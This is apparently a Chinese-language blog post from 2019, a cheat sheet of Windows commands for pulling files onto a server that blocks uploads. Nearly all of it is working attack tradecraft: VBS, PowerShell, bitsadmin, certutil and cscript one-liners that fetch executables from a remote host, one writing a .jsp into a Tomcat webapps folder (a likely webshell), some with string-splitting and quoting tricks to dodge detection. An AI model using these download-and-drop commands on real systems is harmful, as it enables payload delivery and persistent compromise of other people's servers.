常用的远程下载方法
2019年07月11日常用的远程下载方法针对某些服务器禁止上传
vbs下载文件
Set Post = CreateObject("Msxml2.XMLHTTP") Set Shell = CreateObject("Wscript.Shell") Post.Open "GET","http://www.xxx.com/2.exe",0 Post.Send() Set aGet = CreateObject("ADODB.Stream") aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) aGet.SaveToFile "D:\www\1.exe",2
dos下创建 downfile.vbs并写入内容
echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> downfile.vbs cscript downfile.vbs http://192.168.40.13:9090/fileLibrary/5d5X9mSTZXjH9VlhXNN/x.txt D:\\tomcat8.5\\webapps\\x.jsp
powershell下载文件
powershell (new-object System.Net.WebClient).DownloadFile( 'http://www.xxx.com/1.exe','D:\www\1.exe')
Bitsadmin下载文件
bitsadmin /transfer n http://www.xxx.com/cmd.txt D:\www\1.txt
certutil.exe 下载文件
certutil.exe -split -ur"lc"ache -f http://www.xxx.com/1.exe d:/2.txt
cscript 利用js脚本下载文件
#读取 cscript /nologo downfile.js http://127.0.0.1/1.txt
downfile内容
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);WinHttpReq.Send();WScript.Echo(WinHttpReq.ResponseText);
#写入 cscript /nologo downfile2.js http://127.0.0.1/1.txt
downfile2
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);WinHttpReq.Send();BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1;BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody);BinStream.SaveToFile("1.exe");